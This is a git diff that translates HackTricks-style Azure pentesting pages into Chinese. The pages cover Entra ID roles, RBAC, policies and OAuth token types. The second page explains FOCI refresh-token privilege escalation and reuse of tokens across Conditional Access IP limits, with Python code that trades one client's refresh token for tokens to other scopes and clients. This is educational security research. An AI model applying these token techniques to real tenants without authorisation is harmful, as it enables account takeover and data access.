admins can manage user accounts within their region without affecting other regions. +- 场景:一家公司希望区域 IT 管理员仅管理自己区域的用户。 +- 实施: +- 为每个区域创建管理单位(例如,“北美 AU”、“欧洲 AU”)。 +- 用来自各自区域的用户填充 AU。 +- AU 可以**包含用户、组或设备** +- AU 支持**动态成员资格** +- AU **不能包含 AU** +- 分配管理员角色: +- 将“用户管理员”角色授予区域 IT 员工,范围限制在其区域的 AU。 +- 结果:区域 IT 管理员可以管理其区域内的用户帐户,而不影响其他区域。 -### Entra ID Roles +### Entra ID 角色 -- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID - - Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference) -- The most privileged role is **Global Administrator** -- In the Description of the role it’s possible to see its **granular permissions** +- 为了管理 Entra ID,有一些**内置角色**可以分配给 Entra ID 主体以管理 Entra ID +- 在 [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference) 中查看角色 +- 权限最高的角色是**全局管理员** +- 在角色描述中可以看到其**细粒度权限** -## Roles & Permissions +## 角色与权限 -**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)` +**角色**是**分配**给**主体**的**范围**:`principal -[HAS ROLE]->(scope)` -**Roles** assigned to **groups** are **inherited** by all the **members** of the group. +**分配给组的角色**会被组内的所有**成员**继承。 -Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group. +根据角色分配的范围,**角色**可能会**继承**到范围容器内的**其他资源**。例如,如果用户 A 在订阅上有一个**角色**,他将在订阅内的所有资源组和资源组内的**所有资源**上拥有该**角色**。 -### **Classic Roles** +### **经典角色** -| **Owner** |
  • Full access to all resources
  • Can manage access for other users
| All resource types | +| **所有者** |
  • 对所有资源的完全访问
  • 可以管理其他用户的访问
| 所有资源类型 | | ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ | -| **Contributor** |
  • Full access to all resources
  • Cannot manage access
| All resource types | -| **Reader** | • View all resources | All resource types | -| **User Access Administrator** |
  • View all resources
  • Can manage access for other users
| All resource types | +| **贡献者** |
  • 对所有资源的完全访问
  • 不能管理访问
| 所有资源类型 | +| **读取者** | • 查看所有资源 | 所有资源类型 | +| **用户访问管理员** |
  • 查看所有资源
  • 可以管理其他用户的访问
| 所有资源类型 | -### Built-In roles +### 内置角色 -[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.** +[来自文档: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure 基于角色的访问控制(Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) 有几个 Azure **内置角色**,您可以将其**分配**给**用户、组、服务主体和托管身份**。角色分配是您控制**对 Azure 资源的访问**的方式。如果内置角色无法满足您组织的特定需求,您可以创建自己的 [**Azure 自定义角色**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**。** -**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources: +**内置**角色仅适用于**它们所针对的资源**,例如检查这两个**内置角色**在计算资源上的示例: -| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Provides permission to backup vault to perform disk backup. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 | +| [磁盘备份读取者](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | 提供备份库执行磁盘备份的权限。 | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 | | ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ | -| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 | +| [虚拟机用户登录](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | 在门户中查看虚拟机并以常规用户身份登录。 | fb879df8-f326-4884-b1cf-06f3ad86be52 | -This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**. +这些角色也可以**分配给逻辑容器**(如管理组、订阅和资源组),受影响的主体将在**这些容器内的资源上**拥有它们。 -- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). -- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference). +- 在这里找到 [**所有 Azure 内置角色**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles) 的列表。 +- 在这里找到 [**所有 Entra ID 内置角色**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference) 的列表。 -### Custom Roles +### 自定义角色 -- It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) -- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups) -- It’s possible to configure all the granular permissions the custom role will have -- It’s possible to exclude permissions - - A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere -- It’s possible to use wildcards -- The used format is a JSON - - `actions` are for control actions over the resource - - `dataActions` are permissions over the data within the object - -Example of permissions JSON for a custom role: +- 也可以创建 [**自定义角色**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) +- 它们是在一个范围内创建的,尽管一个角色可以在多个范围内(管理组、订阅和资源组) +- 可以配置自定义角色将拥有的所有细粒度权限 +- 可以排除权限 +- 拥有排除权限的主体即使在其他地方授予权限也无法使用该权限 +- 可以使用通配符 +- 使用的格式是 JSON +- `actions` 用于控制对资源的操作 +- `dataActions` 是对对象内数据的权限 +自定义角色的权限 JSON 示例: ```json { - "properties": { - "roleName": "", - "description": "", - "assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"], - "permissions": [ - { - "actions": [ - "Microsoft.DigitalTwins/register/action", - "Microsoft.DigitalTwins/unregister/action", - "Microsoft.DigitalTwins/operations/read", - "Microsoft.DigitalTwins/digitalTwinsInstances/read", - "Microsoft.DigitalTwins/digitalTwinsInstances/write", - "Microsoft.CostManagement/exports/*" - ], - "notActions": [ - "Astronomer.Astro/register/action", - "Astronomer.Astro/unregister/action", - "Astronomer.Astro/operations/read", - "Astronomer.Astro/organizations/read" - ], - "dataActions": [], - "notDataActions": [] - } - ] - } +"properties": { +"roleName": "", +"description": "", +"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"], +"permissions": [ +{ +"actions": [ +"Microsoft.DigitalTwins/register/action", +"Microsoft.DigitalTwins/unregister/action", +"Microsoft.DigitalTwins/operations/read", +"Microsoft.DigitalTwins/digitalTwinsInstances/read", +"Microsoft.DigitalTwins/digitalTwinsInstances/write", +"Microsoft.CostManagement/exports/*" +], +"notActions": [ +"Astronomer.Astro/register/action", +"Astronomer.Astro/unregister/action", +"Astronomer.Astro/operations/read", +"Astronomer.Astro/organizations/read" +], +"dataActions": [], +"notDataActions": [] +} +] +} } ``` +### 权限顺序 -### Permissions order - -- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**. -- An explicit **deny role assignment takes precedence** over the role granting the permission. +- 为了让一个 **主体对资源有某些访问权限**,他需要被授予一个明确的角色(以任何方式)**授予他该权限**。 +- 明确的 **拒绝角色分配优先于** 授予权限的角色。

https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10

-### Global Administrator +### 全局管理员 -Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default. +全局管理员是 Entra ID 的一个角色,授予 **对 Entra ID 租户的完全控制**。然而,默认情况下,它并不授予对 Azure 资源的任何权限。 -Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\ -This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties) +拥有全局管理员角色的用户可以在根管理组中 **“提升”到用户访问管理员 Azure 角色**。因此,全局管理员可以管理 **所有 Azure 订阅和管理组的访问**。\ +此提升可以在页面底部完成:[https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
-### Azure Policies +### Azure 策略 -**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking. +**Azure 策略** 是帮助组织确保其资源符合特定标准和合规要求的规则。它们允许您 **强制执行或审核 Azure 中资源的设置**。例如,您可以防止在未经授权的区域创建虚拟机,或确保所有资源都有特定标签以便跟踪。 -Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources. +Azure 策略是 **主动的**:它们可以阻止不合规资源的创建或更改。它们也是 **反应性的**,允许您查找并修复现有的不合规资源。 -#### **Key Concepts** +#### **关键概念** -1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required. -2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group). -3. **Initiatives**: A collection of policies grouped together for broader enforcement. -4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append"). +1. **策略定义**:以 JSON 编写的规则,指定允许或要求的内容。 +2. **策略分配**:将策略应用于特定范围(例如,订阅、资源组)。 +3. **倡议**:一组政策的集合,用于更广泛的执行。 +4. **效果**:指定当策略被触发时会发生什么(例如,“拒绝”、“审核”或“附加”)。 -**Some examples:** +**一些示例:** -1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance. -2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments. -3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs. -4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. This is useful for cost tracking, ownership, or categorization of resources. -5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network. -6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption. +1. **确保符合特定 Azure 区域的合规性**:此策略确保所有资源在特定 Azure 区域中部署。例如,一家公司可能希望确保其所有数据存储在欧洲以符合 GDPR 合规性。 +2. **强制命名标准**:策略可以强制 Azure 资源的命名约定。这有助于根据名称组织和轻松识别资源,这在大型环境中非常有用。 +3. **限制某些资源类型**:此策略可以限制某些类型资源的创建。例如,可以设置策略以防止创建某些虚拟机大小等昂贵资源类型,以控制成本。 +4. **强制标签策略**:标签是与 Azure 资源关联的键值对,用于资源管理。策略可以强制要求所有资源必须存在某些标签,或具有特定值。这对于成本跟踪、所有权或资源分类非常有用。 +5. **限制对资源的公共访问**:策略可以强制某些资源(如存储帐户或数据库)没有公共端点,确保它们仅在组织的网络内可访问。 +6. **自动应用安全设置**:策略可以用于自动将安全设置应用于资源,例如将特定网络安全组应用于所有虚拟机或确保所有存储帐户使用加密。 -Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups. - -Azure policy json example: +请注意,Azure 策略可以附加到 Azure 层次结构的任何级别,但它们 **通常用于根管理组** 或其他管理组。 +Azure 策略 JSON 示例: ```json { - "policyRule": { - "if": { - "field": "location", - "notIn": ["eastus", "westus"] - }, - "then": { - "effect": "Deny" - } - }, - "parameters": {}, - "displayName": "Allow resources only in East US and West US", - "description": "This policy ensures that resources can only be created in East US or West US.", - "mode": "All" +"policyRule": { +"if": { +"field": "location", +"notIn": ["eastus", "westus"] +}, +"then": { +"effect": "Deny" +} +}, +"parameters": {}, +"displayName": "Allow resources only in East US and West US", +"description": "This policy ensures that resources can only be created in East US or West US.", +"mode": "All" } ``` +### 权限继承 -### Permissions Inheritance +在 Azure **权限可以分配给层级的任何部分**。这包括管理组、订阅、资源组和单个资源。权限由分配它们的实体的包含 **资源** 继承。 -In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned. - -This hierarchical structure allows for efficient and scalable management of access permissions. +这种层级结构允许高效和可扩展的访问权限管理。
-### Azure RBAC vs ABAC +### Azure RBAC 与 ABAC -**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\ -However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**. +**RBAC**(基于角色的访问控制)是我们在前面的部分中已经看到的:**将角色分配给主体以授予其对资源的访问权限**。\ +然而,在某些情况下,您可能希望提供 **更细粒度的访问管理** 或 **简化** **数百个** 角色 **分配** 的管理。 -Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\ -You **cannot** explicitly **deny** **access** to specific resources **using conditions**. +Azure **ABAC**(基于属性的访问控制)在 Azure RBAC 的基础上,通过在特定操作的上下文中添加 **基于属性的角色分配条件** 来构建。_角色分配条件_ 是您可以选择性地添加到角色分配中的 **额外检查**,以提供更细粒度的访问控制。条件过滤作为角色定义和角色分配一部分授予的权限。例如,您可以 **添加一个条件,要求对象具有特定标签才能读取该对象**。\ +您 **不能** 明确 **拒绝** **对特定资源的访问** **使用条件**。 -## References +## 参考文献 - [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview) - [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions) @@ -379,7 +375,3 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond - [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md index d076e723a..c88b11faa 100644 --- a/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md +++ b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md @@ -4,98 +4,97 @@ ## Basic Information -Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources. +Entra ID 是微软基于云的身份和访问管理(IAM)平台,作为 Microsoft 365 和 Azure Resource Manager 等服务的基础认证和授权系统。Azure AD 实现了 OAuth 2.0 授权框架和 OpenID Connect (OIDC) 认证协议,以管理对资源的访问。 ### OAuth -**Key Participants in OAuth 2.0:** +**OAuth 2.0 的关键参与者:** -1. **Resource Server (RS):** Protects resources owned by the resource owner. -2. **Resource Owner (RO):** Typically an end-user who owns the protected resources. -3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner. -4. **Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them. +1. **资源服务器 (RS):** 保护资源所有者拥有的资源。 +2. **资源所有者 (RO):** 通常是拥有受保护资源的最终用户。 +3. **客户端应用程序 (CA):** 代表资源所有者请求访问资源的应用程序。 +4. **授权服务器 (AS):** 在验证和授权客户端应用程序后向其发放访问令牌。 -**Scopes and Consent:** +**范围和同意:** -- **Scopes:** Granular permissions defined on the resource server that specify access levels. -- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes. +- **范围:** 在资源服务器上定义的细粒度权限,指定访问级别。 +- **同意:** 资源所有者授予客户端应用程序访问特定范围资源的权限的过程。 -**Microsoft 365 Integration:** +**Microsoft 365 集成:** -- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications. -- These applications are deeply integrated and often have interdependent service relationships. -- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications. -- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l. -- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces. +- Microsoft 365 利用 Azure AD 进行 IAM,并由多个“第一方”OAuth 应用程序组成。 +- 这些应用程序深度集成,通常具有相互依赖的服务关系。 +- 为了简化用户体验并保持功能,微软对这些第一方应用程序授予“隐含同意”或“预先同意”。 +- **隐含同意:** 某些应用程序在没有明确用户或管理员批准的情况下**自动获得对特定范围的访问权限**。 +- 这些预先同意的范围通常对用户和管理员都是隐藏的,使其在标准管理界面中不太可见。 -**Client Application Types:** +**客户端应用程序类型:** -1. **Confidential Clients:** - - Possess their own credentials (e.g., passwords or certificates). - - Can **securely authenticate themselves** to the authorization server. -2. **Public Clients:** - - Do not have unique credentials. - - Cannot securely authenticate to the authorization server. - - **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application. +1. **机密客户端:** +- 拥有自己的凭据(例如,密码或证书)。 +- 可以**安全地向授权服务器进行身份验证**。 +2. **公共客户端:** +- 没有唯一凭据。 +- 不能安全地向授权服务器进行身份验证。 +- **安全隐患:** 攻击者可以在请求令牌时冒充公共客户端应用程序,因为授权服务器没有机制来验证应用程序的合法性。 ## Authentication Tokens -There are **three types of tokens** used in OIDC: +在 OIDC 中使用**三种类型的令牌**: -- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default. -- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**. -- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens). - - A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**. - - A refresh token is encrypted and only Microsoft can decrypt it. - - Getting a new refresh token doesn't revoke the previous refresh token. +- [**访问令牌**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** 客户端将此令牌呈现给资源服务器以**访问资源**。它只能用于特定的用户、客户端和资源组合,并且**在到期之前无法被撤销** - 默认情况下为 1 小时。 +- **ID 令牌**:客户端从**授权服务器**接收此**令牌**。它包含有关用户的基本信息。它**绑定到特定的用户和客户端组合**。 +- **刷新令牌**:与访问令牌一起提供给客户端。用于**获取新的访问和 ID 令牌**。它绑定到特定的用户和客户端组合,并且可以被撤销。默认过期时间为**90 天**(对于不活动的刷新令牌)和**活动令牌没有过期**(可以从刷新令牌获取新的刷新令牌)。 +- 刷新令牌应与**`aud`**、某些**范围**和**租户**相关联,并且只能为该 aud、范围(且不更多)和租户生成访问令牌。然而,**FOCI 应用程序令牌**并非如此。 +- 刷新令牌是加密的,只有微软可以解密它。 +- 获取新的刷新令牌不会撤销先前的刷新令牌。 > [!WARNING] -> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**. +> **条件访问**的信息存储在**JWT**中。因此,如果您从**允许的 IP 地址**请求**令牌**,该**IP**将被**存储**在令牌中,然后您可以使用该令牌从**不允许的 IP 访问资源**。 ### Access Tokens "aud" -The field indicated in the "aud" field is the **resource server** (the application) used to perform the login. +“aud”字段中指示的字段是用于执行登录的**资源服务器**(应用程序)。 -The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token: +命令 `az account get-access-token --resource-type [...]` 支持以下类型,每种类型将在结果访问令牌中添加特定的“aud”: > [!CAUTION] -> Note that the following are just the APIs supported by `az account get-access-token` but there are more. +> 请注意,以下仅是 `az account get-access-token` 支持的 API,但还有更多。
-aud examples +aud 示例 -- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD). - - `https://graph.windows.net/` +- **aad-graph (Azure Active Directory Graph API)**:用于访问已弃用的 Azure AD Graph API,允许应用程序读取和写入 Azure Active Directory (Azure AD) 中的目录数据。 +- `https://graph.windows.net/` -* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more. - - `https://management.core.windows.net/ or https://management.azure.com/` +* **arm (Azure Resource Manager)**:用于通过 Azure Resource Manager API 管理 Azure 资源。这包括创建、更新和删除虚拟机、存储帐户等资源的操作。 +- `https://management.core.windows.net/ 或 https://management.azure.com/` -- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud. - - `https://batch.core.windows.net/` +- **batch (Azure Batch Services)**:用于访问 Azure Batch,这是一项服务,可有效地在云中启用大规模并行和高性能计算应用程序。 +- `https://batch.core.windows.net/` -* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service. - - `https://datalake.azure.net/` +* **data-lake (Azure Data Lake Storage)**:用于与 Azure Data Lake Storage Gen1 交互,这是一项可扩展的数据存储和分析服务。 +- `https://datalake.azure.net/` -- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content. - - `https://rest.media.azure.net` +- **media (Azure Media Services)**:用于访问 Azure Media Services,提供基于云的视频和音频内容处理和交付服务。 +- `https://rest.media.azure.net` -* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services. - - `https://graph.microsoft.com` +* **ms-graph (Microsoft Graph API)**:用于访问 Microsoft Graph API,这是 Microsoft 365 服务数据的统一端点。它允许您访问 Azure AD、Office 365、企业移动性和安全服务等服务的数据和见解。 +- `https://graph.microsoft.com` -- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB. - - `https://ossrdbms-aad.database.windows.net` +- **oss-rdbms (Azure Open Source Relational Databases)**:用于访问 Azure 数据库服务,支持开源关系数据库引擎,如 MySQL、PostgreSQL 和 MariaDB。 +- `https://ossrdbms-aad.database.windows.net`
### Access Tokens Scopes "scp" -The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to. +访问令牌的范围存储在访问令牌 JWT 内的 scp 键中。这些范围定义了访问令牌可以访问的内容。 -If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT. +如果 JWT 被允许联系特定 API,但**没有范围**来执行请求的操作,则它**将无法使用该 JWT 执行该操作**。 ### Get refresh & access token example - ```python # Code example from https://github.com/secureworks/family-of-client-ids-research import msal @@ -107,17 +106,17 @@ from typing import Any, Dict, List # LOGIN VIA CODE FLOW AUTHENTICATION azure_cli_client = msal.PublicClientApplication( - "04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client +"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client ) device_flow = azure_cli_client.initiate_device_flow( - scopes=["https://graph.microsoft.com/.default"] +scopes=["https://graph.microsoft.com/.default"] ) print(device_flow["message"]) # Perform device code flow authentication azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow( - device_flow +device_flow ) pprint(azure_cli_bearer_tokens_for_graph_api) @@ -125,83 +124,74 @@ pprint(azure_cli_bearer_tokens_for_graph_api) # DECODE JWT def decode_jwt(base64_blob: str) -> Dict[str, Any]: - """Decodes base64 encoded JWT blob""" - return jwt.decode( - base64_blob, options={"verify_signature": False, "verify_aud": False} - ) +"""Decodes base64 encoded JWT blob""" +return jwt.decode( +base64_blob, options={"verify_signature": False, "verify_aud": False} +) decoded_access_token = decode_jwt( - azure_cli_bearer_tokens_for_graph_api.get("access_token") +azure_cli_bearer_tokens_for_graph_api.get("access_token") ) pprint(decoded_access_token) # GET NEW ACCESS TOKEN AND REFRESH TOKEN new_azure_cli_bearer_tokens_for_graph_api = ( - # Same client as original authorization - azure_cli_client.acquire_token_by_refresh_token( - azure_cli_bearer_tokens_for_graph_api.get("refresh_token"), - # Same scopes as original authorization - scopes=["https://graph.microsoft.com/.default"], - ) +# Same client as original authorization +azure_cli_client.acquire_token_by_refresh_token( +azure_cli_bearer_tokens_for_graph_api.get("refresh_token"), +# Same scopes as original authorization +scopes=["https://graph.microsoft.com/.default"], +) ) pprint(new_azure_cli_bearer_tokens_for_graph_api) ``` - ## FOCI Tokens Privilege Escalation -Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended. +之前提到,刷新令牌应该与生成时的**范围**、**应用程序**和**租户**绑定。如果任何这些边界被打破,就有可能提升权限,因为将能够生成访问令牌以访问用户有权限的其他资源和租户,并且具有比最初预期更多的范围。 -Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them." +此外,**这对于所有刷新令牌都是可能的**,在[Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/)(Microsoft Entra 账户、Microsoft 个人账户以及 Facebook 和 Google 等社交账户)中,因为正如[**文档**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens)所提到的:“刷新令牌绑定于用户和客户端的组合,但**不与资源或租户绑定**。客户端可以使用刷新令牌获取**在其有权限的任何资源和租户组合**中的访问令牌。刷新令牌是加密的,只有 Microsoft identity platform 可以读取它们。” -Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server. +此外,请注意 FOCI 应用程序是公共应用程序,因此**不需要秘密**来进行服务器身份验证。 -Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv). +然后在[**原始研究**](https://github.com/secureworks/family-of-client-ids-research/tree/main)中报告的已知 FOCI 客户端可以[**在这里找到**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv)。 ### Get different scope -Following with the previous example code, in this code it's requested a new token for a different scope: - +继续之前的示例代码,在此代码中请求一个不同范围的新令牌: ```python # Code from https://github.com/secureworks/family-of-client-ids-research azure_cli_bearer_tokens_for_outlook_api = ( - # Same client as original authorization - azure_cli_client.acquire_token_by_refresh_token( - new_azure_cli_bearer_tokens_for_graph_api.get( - "refresh_token" - ), - # But different scopes than original authorization - scopes=[ - "https://outlook.office.com/.default" - ], - ) +# Same client as original authorization +azure_cli_client.acquire_token_by_refresh_token( +new_azure_cli_bearer_tokens_for_graph_api.get( +"refresh_token" +), +# But different scopes than original authorization +scopes=[ +"https://outlook.office.com/.default" +], +) ) pprint(azure_cli_bearer_tokens_for_outlook_api) ``` - -### Get different client and scopes - +### 获取不同的客户端和范围 ```python # Code from https://github.com/secureworks/family-of-client-ids-research microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c") microsoft_office_bearer_tokens_for_graph_api = ( - # This is a different client application than we used in the previous examples - microsoft_office_client.acquire_token_by_refresh_token( - # But we can use the refresh token issued to our original client application - azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"), - # And request different scopes too - scopes=["https://graph.microsoft.com/.default"], - ) +# This is a different client application than we used in the previous examples +microsoft_office_client.acquire_token_by_refresh_token( +# But we can use the refresh token issued to our original client application +azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"), +# And request different scopes too +scopes=["https://graph.microsoft.com/.default"], +) ) # How is this possible? 